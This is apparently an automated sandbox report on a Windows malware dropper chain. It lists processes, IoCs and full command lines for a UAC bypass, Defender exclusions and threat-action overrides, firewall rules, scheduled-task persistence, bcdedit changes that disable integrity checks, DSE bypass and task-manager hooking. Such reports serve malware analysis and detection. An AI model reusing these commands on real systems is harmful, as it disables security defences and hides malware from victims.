pid Process 2760 amert.exe 1256 explorha.exe 2468 chrome.exe 2468 chrome.exe 2364 powershell.exe 3268 rundll32.exe 3268 rundll32.exe 3268 rundll32.exe 3268 rundll32.exe 3268 rundll32.exe 3268 rundll32.exe 3156 u1jo.0.exe 3156 u1jo.0.exe 3156 u1jo.0.exe 3268 rundll32.exe 3268 rundll32.exe 3268 rundll32.exe 3268 rundll32.exe 3268 rundll32.exe 3268 rundll32.exe 3704 powershell.exe 2872 jok.exe 3156 u1jo.0.exe 3156 u1jo.0.exe 3156 u1jo.0.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeDebugPrivilege 2088 file300un.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeDebugPrivilege 3036 regasm.exe Token: SeDebugPrivilege 2364 powershell.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeDebugPrivilege 2872 jok.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe Token: SeShutdownPrivilege 2468 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2084 98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe 2760 amert.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 4000 u1jo.1.exe 4000 u1jo.1.exe 4000 u1jo.1.exe 4000 u1jo.1.exe 4000 u1jo.1.exe 4000 u1jo.1.exe 4000 u1jo.1.exe -
Suspicious use of SendNotifyMessage 63 IoCs
pid Process 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2468 chrome.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 4000 u1jo.1.exe 4000 u1jo.1.exe 4000 u1jo.1.exe 4000 u1jo.1.exe 4000 u1jo.1.exe 4000 u1jo.1.exe 4000 u1jo.1.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe 2572 bcaa5b1d77.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2084 wrote to memory of 2604 2084 98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe 28 PID 2084 wrote to memory of 2604 2084 98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe 28 PID 2084 wrote to memory of 2604 2084 98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe 28 PID 2084 wrote to memory of 2604 2084 98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe 28 PID 2604 wrote to memory of 2972 2604 explorta.exe 30 PID 2604 wrote to memory of 2972 2604 explorta.exe 30 PID 2604 wrote to memory of 2972 2604 explorta.exe 30 PID 2604 wrote to memory of 2972 2604 explorta.exe 30 PID 2604 wrote to memory of 2760 2604 explorta.exe 31 PID 2604 wrote to memory of 2760 2604 explorta.exe 31 PID 2604 wrote to memory of 2760 2604 explorta.exe 31 PID 2604 wrote to memory of 2760 2604 explorta.exe 31 PID 2760 wrote to memory of 1256 2760 amert.exe 32 PID 2760 wrote to memory of 1256 2760 amert.exe 32 PID 2760 wrote to memory of 1256 2760 amert.exe 32 PID 2760 wrote to memory of 1256 2760 amert.exe 32 PID 1256 wrote to memory of 2780 1256 explorha.exe 33 PID 1256 wrote to memory of 2780 1256 explorha.exe 33 PID 1256 wrote to memory of 2780 1256 explorha.exe 33 PID 1256 wrote to memory of 2780 1256 explorha.exe 33 PID 1256 wrote to memory of 2780 1256 explorha.exe 33 PID 1256 wrote to memory of 2780 1256 explorha.exe 33 PID 1256 wrote to memory of 2780 1256 explorha.exe 33 PID 2780 wrote to memory of 764 2780 swiiiii.exe 35 PID 2780 wrote to memory of 764 2780 swiiiii.exe 35 PID 2780 wrote to memory of 764 2780 swiiiii.exe 35 PID 2780 wrote to memory of 764 2780 swiiiii.exe 35 PID 2780 wrote to memory of 764 2780 swiiiii.exe 35 PID 2780 wrote to memory of 764 2780 swiiiii.exe 35 PID 2780 wrote to memory of 764 2780 swiiiii.exe 35 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 2780 wrote to memory of 988 2780 swiiiii.exe 36 PID 988 wrote to memory of 1800 988 RegAsm.exe 37 PID 988 wrote to memory of 1800 988 RegAsm.exe 37 PID 988 wrote to memory of 1800 988 RegAsm.exe 37 PID 988 wrote to memory of 1800 988 RegAsm.exe 37 PID 2780 wrote to memory of 632 2780 swiiiii.exe 38 PID 2780 wrote to memory of 632 2780 swiiiii.exe 38 PID 2780 wrote to memory of 632 2780 swiiiii.exe 38 PID 2780 wrote to memory of 632 2780 swiiiii.exe 38 PID 2604 wrote to memory of 1948 2604 explorta.exe 39 PID 2604 wrote to memory of 1948 2604 explorta.exe 39 PID 2604 wrote to memory of 1948 2604 explorta.exe 39 PID 2604 wrote to memory of 1948 2604 explorta.exe 39 PID 1256 wrote to memory of 2872 1256 explorha.exe 40 PID 1256 wrote to memory of 2872 1256 explorha.exe 40 PID 1256 wrote to memory of 2872 1256 explorha.exe 40 PID 1256 wrote to memory of 2872 1256 explorha.exe 40 PID 1256 wrote to memory of 3008 1256 explorha.exe 203 PID 1256 wrote to memory of 3008 1256 explorha.exe 203 PID 1256 wrote to memory of 3008 1256 explorha.exe 203 PID 1256 wrote to memory of 3008 1256 explorha.exe 203 PID 3008 wrote to memory of 1640 3008 swiiii.exe 45 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe"C:\Users\Admin\AppData\Local\Temp\98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"3⤵PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:764
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 2567⤵
- Program crash
PID:1800
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 5606⤵
- Loads dropped DLL
- Program crash
PID:632
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:1640
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"5⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"6⤵
- Drops startup file
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:3036 -
C:\Users\Admin\Pictures\Xe7EjKVAqAMRHsbNmIAyvjKY.exe"C:\Users\Admin\Pictures\Xe7EjKVAqAMRHsbNmIAyvjKY.exe"7⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\u1jo.0.exe"C:\Users\Admin\AppData\Local\Temp\u1jo.0.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3156
-
-
C:\Users\Admin\AppData\Local\Temp\u1jo.1.exe"C:\Users\Admin\AppData\Local\Temp\u1jo.1.exe"8⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4000 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD19⤵PID:3428
-
-
-
-
C:\Users\Admin\Pictures\d0KivyMFNNmcnXIqPmyGk9JJ.exe"C:\Users\Admin\Pictures\d0KivyMFNNmcnXIqPmyGk9JJ.exe"7⤵
- Executes dropped EXE
PID:2852 -
C:\Users\Admin\Pictures\d0KivyMFNNmcnXIqPmyGk9JJ.exe"C:\Users\Admin\Pictures\d0KivyMFNNmcnXIqPmyGk9JJ.exe"8⤵PID:1944
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"9⤵PID:1568
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes10⤵
- Modifies Windows Firewall
PID:3712
-
-
-
-
-
C:\Users\Admin\Pictures\jSufjXRDasGbzBaPXI4Wjkit.exe"C:\Users\Admin\Pictures\jSufjXRDasGbzBaPXI4Wjkit.exe"7⤵
- Executes dropped EXE
PID:2448 -
C:\Users\Admin\Pictures\jSufjXRDasGbzBaPXI4Wjkit.exe"C:\Users\Admin\Pictures\jSufjXRDasGbzBaPXI4Wjkit.exe"8⤵PID:788
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"9⤵PID:3436
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes10⤵
- Modifies Windows Firewall
PID:2128
-
-
-
-
-
C:\Users\Admin\Pictures\Nll8iSM3Es6hQuUFVGdpDLKp.exe"C:\Users\Admin\Pictures\Nll8iSM3Es6hQuUFVGdpDLKp.exe"7⤵
- Executes dropped EXE
PID:268 -
C:\Users\Admin\Pictures\Nll8iSM3Es6hQuUFVGdpDLKp.exe"C:\Users\Admin\Pictures\Nll8iSM3Es6hQuUFVGdpDLKp.exe"8⤵PID:2876
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"9⤵PID:1576
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes10⤵
- Modifies Windows Firewall
PID:916
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe9⤵PID:4000
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F10⤵
- Creates scheduled task(s)
PID:3876
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f10⤵PID:3360
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"10⤵PID:2020
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER11⤵
- Modifies boot configuration data using bcdedit
PID:1120
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:11⤵
- Modifies boot configuration data using bcdedit
PID:1404
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:11⤵
- Modifies boot configuration data using bcdedit
PID:3020
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows11⤵
- Modifies boot configuration data using bcdedit
PID:2508
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe11⤵
- Modifies boot configuration data using bcdedit
PID:2240
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe11⤵
- Modifies boot configuration data using bcdedit
PID:2980
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 011⤵
- Modifies boot configuration data using bcdedit
PID:1632
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn11⤵
- Modifies boot configuration data using bcdedit
PID:3276
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 111⤵
- Modifies boot configuration data using bcdedit
PID:1708
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}11⤵
- Modifies boot configuration data using bcdedit
PID:1460
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast11⤵
- Modifies boot configuration data using bcdedit
PID:832
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 011⤵
- Modifies boot configuration data using bcdedit
PID:2284
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}11⤵
- Modifies boot configuration data using bcdedit
PID:3532
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll10⤵PID:932
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v10⤵
- Modifies boot configuration data using bcdedit
PID:3268
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe10⤵PID:1620
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F10⤵
- Creates scheduled task(s)
PID:1796
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"10⤵PID:3620
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)11⤵PID:2548
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)12⤵
- Launches sc.exe
PID:3680
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\qC1NgtgLPRjIDtSFdVkXHXB8.exe"C:\Users\Admin\Pictures\qC1NgtgLPRjIDtSFdVkXHXB8.exe"7⤵
- Executes dropped EXE
PID:3080 -
C:\Users\Admin\Pictures\qC1NgtgLPRjIDtSFdVkXHXB8.exe"C:\Users\Admin\Pictures\qC1NgtgLPRjIDtSFdVkXHXB8.exe"8⤵PID:1796
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"9⤵PID:1288
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes10⤵
- Modifies Windows Firewall
PID:2892
-
-
-
-
-
C:\Users\Admin\Pictures\z278k3sED2oaPPuKC1qIfUPJ.exe"C:\Users\Admin\Pictures\z278k3sED2oaPPuKC1qIfUPJ.exe"7⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2540
-
-
C:\Users\Admin\Pictures\Ki9uLqg9jS1UxJFc7oOmpqTm.exe"C:\Users\Admin\Pictures\Ki9uLqg9jS1UxJFc7oOmpqTm.exe"7⤵
- Executes dropped EXE
PID:1572 -
C:\Users\Admin\AppData\Local\Temp\7zSF99B.tmp\Install.exe.\Install.exe /ThYFdiduvbI "385118" /S8⤵
- Executes dropped EXE
PID:3756 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵PID:3992
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"10⤵PID:3936
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:4036
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵PID:4084
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"10⤵PID:3140
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵PID:3224
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵PID:280
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"10⤵PID:3396
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵PID:3904
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵PID:3720
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"10⤵PID:3288
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵PID:3884
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵PID:3252
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵PID:3872
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵PID:3484
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
- Command and Scripting Interpreter: PowerShell
